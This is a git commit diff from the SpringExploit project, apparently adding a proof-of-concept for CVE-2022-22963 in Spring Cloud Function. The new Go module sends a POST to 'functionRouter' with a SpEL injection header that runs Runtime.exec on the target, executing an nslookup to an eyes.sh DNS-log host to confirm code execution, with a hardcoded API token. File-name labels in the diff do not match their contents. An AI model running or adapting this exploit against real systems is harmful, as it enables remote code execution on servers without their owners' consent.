支持漏洞CVE-2022-22963检测

Author: SummerSec

cmd/commons/attack/attack.go

@@ -25,11 +25,11 @@ func init() {
 }
 
 func addPoc(pocs map[string]interface{}) map[string]interface{} {
-	log.Debugln("github.com/SummerSec/SpringExploit/cmd/commons/attack/attack.go:25")
 	log.Debug("[*] Add PoC")
 	// TODO 添加poc
 	//pocs["demo"] = &poc.Demo{}
-	pocs["CVE202222947"] = &poc.CVE202222947{}
+	//pocs["CVE202222947"] = &poc.CVE202222947{}
+	pocs["CVE202222963"] = &poc.CVE202222963{}
 	return pocs
 
 }

cmd/commons/poc/CVE-2022-22947.go

@@ -0,0 +1,71 @@
+package poc
+
+import (
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	"github.com/fatih/structs"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+)
+
+type CVE202222963 struct{}
+
+func (p CVE202222963) SendPoc(target string, hashmap map[string]interface{}) {
+
+	reqinfo := NewReqInfo()
+	reqmap := structs.Map(reqinfo)
+	url := target + "functionRouter"
+	reqmap["url"] = url
+	reqmap["method"] = "POST"
+	dnslog := &utils.Dnslog{}
+	dnslog.SetId("CVE-2022-22963")
+	ranStr := dnslog.Id()
+	dnslog.SetPre("dns")
+	cmd := "nslookup " + ranStr + ".skysa.eyes.sh"
+	//cmd := "calc.exe"
+	log.Debugln(cmd)
+	payload := "T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\")"
+	//payload := "T(java.net.InetAddress).getByName(\"" + ranStr + ".skysa.eyes.sh\")"
+	log.Debugf("payload: %s", payload)
+	log.Debugf("dnslog: %s", dnslog)
+
+	reqmap["timeout"] = hashmap["Timeout"].(int)
+	reqmap["retry"] = hashmap["Retry"].(int)
+	reqmap["proxy"] = hashmap["Proxy"].(string)
+	reqmap["mode"] = hashmap["Mode"].(int)
+	reqmap["headers"] = map[string]string{
+		"User-Agent":   utils.GetUA(),
+		"Content-Type": "application/x-www-form-urlencoded",
+		//"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
+		"spring.cloud.function.routing-expression": payload,
+	}
+
+	reqmap["method"] = "POST"
+	reqmap["body"] = ranStr
+	// 发送请求
+	resp := utils.Send(reqmap)
+
+	res := dnslog.GetDnslog()
+	if res {
+		if p.checkExp(resp, target, hashmap["Out"].(string)) {
+			log.Infof("[+] %s: %s", target, "CVE-2022-22963")
+			p.saveResult(target, hashmap["Out"].(string))
+		}
+	}
+
+}
+
+func (CVE202222963) init() {
+	log.Debugf("CVE-2022-22963 init")
+
+}
+
+func (CVE202222963) saveResult(target string, file string) {
+	context := target + "   存在CVE-2022-22963漏洞\n"
+	utils.SaveToFile(context, file)
+}
+
+func (p CVE202222963) checkExp(resp *req.Response, dnslog string, file string) bool {
+	log.Debugf("CVE-2022-22963 checkExp")
+	return true
+
+}

cmd/commons/poc/CVE-2022-22963.go

@@ -0,0 +1,51 @@
+package utils
+
+import (
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+	"time"
+)
+
+const dnslogPre = "http://eyes.sh/api/"
+const skysa = "/skysa/"
+const token = "/?token=69a0b901"
+
+type Dnslog struct {
+	id  string
+	pre string // dns or web
+}
+
+func (d *Dnslog) Pre() string {
+	return d.pre
+}
+
+func (d *Dnslog) SetPre(pre string) {
+	d.pre = pre
+}
+
+func (d *Dnslog) Id() string {
+	return d.id
+}
+
+func (d *Dnslog) SetId(id string) {
+	d.id = GetCode(16)
+	//d.id = id
+}
+
+func (d *Dnslog) GetDnslog() bool {
+	uuid := d.Id()
+	//uuid := "dnslog"
+	log.Debugln("uuid: ", uuid)
+	d.SetId(uuid)
+	t := d.Pre()
+	log.Debugln("type: ", t)
+	url := dnslogPre + t + skysa + uuid + token
+	time.Sleep(time.Second * 3)
+	log.Debugf("url: %s", url)
+	resp, _ := req.R().Get(url)
+	log.Debugln(resp.String())
+	if resp.String() == "True" {
+		return true
+	}
+	return false
+}

cmd/commons/utils/dnslog.go

@@ -16,6 +16,7 @@ func InIt(mode int, timeout int, proxy string, retry int) (client *req.Client) {
 	// 设置超时时间
 	client.SetTimeout(time.Duration(timeout) * time.Second)
 	client.SetCommonRetryCount(retry)
+	client.DisableInsecureSkipVerify()
 	// 设置代理
 	f := IsProxyUrl(proxy)
 	if f {

cmd/commons/utils/httpclient.go

@@ -2,11 +2,17 @@ package utils
 
 import (
 	"github.com/imroc/req/v3"
+	"net/http"
 )
 
 // SetRequest 设置请求头和请求boby
 func SetRequest(req *req.Request, headers map[string]string, body string) *req.Request {
-	req.SetHeaders(headers)
+	//req.SetHeaders(headers)
+
+	req.Headers = make(http.Header)
+	for k, v := range headers {
+		req.Headers[k] = []string{v}
+	}
 	req.SetBody(body)
 	return req
 

cmd/commons/utils/setrequest.go

@@ -9,6 +9,7 @@ import (
 
 // GetUA UserAgent generates a random user agent
 func GetUA() string {
+	//return browser.Random()
 	return uarand.GetRandom()
 }
 

cmd/commons/utils/useragent.go

@@ -0,0 +1,18 @@
+package main
+
+import (
+	"fmt"
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	log "github.com/sirupsen/logrus"
+)
+
+func main() {
+	dnslog := &utils.Dnslog{}
+	dnslog.SetPre("dns")
+	dnslog.SetId("dnslog")
+	f := dnslog.GetDnslog()
+	fmt.Println(dnslog.Id())
+	log.Debugf("id: ", dnslog.Id)
+	fmt.Println(f)
+
+}

cmd/test/dnslog.go

@@ -1,21 +1,22 @@
 package main
 
 import (
-	"github.com/SummerSec/SpringExploit/cmd/commons/poc"
-	"github.com/imdario/mergo"
+	"fmt"
+	"net/http"
 )
 
 func main() {
-
-	req := poc.NewReqInfo()
 	hashmap := map[string]string{
-		"proxy":   "http://127.0.0.1:8080",
-		"url":     "http://backdoor.com",
-		"timeout": "5",
-		"repeat":  "3",
+		"foo": "bar",
+		"baz": "qux",
 	}
-
-	//mergo.Merge(&req, hashmap)
-	mergo.Map(&req, hashmap)
+	header := make(http.Header)
+	for k, v := range hashmap {
+		header[k] = []string{v}
+	}
+	req, _ := http.NewRequest("GET", "http://sumsec.me", nil)
+	req.Header = header
+	resp, _ := http.DefaultClient.Do(req)
+	fmt.Println(resp)
 
 }

cmd/test/header.go

@@ -4,11 +4,9 @@ go 1.13
 
 require (
 	github.com/corpix/uarand v0.1.1
-	github.com/fatih/color v1.13.0
 	github.com/fatih/structs v1.1.0
-	github.com/imdario/mergo v0.3.12 // indirect
 	github.com/imroc/req/v3 v3.10.0
-	github.com/jinzhu/copier v0.3.5 // indirect
 	github.com/sirupsen/logrus v1.8.1
+	golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect
 
 )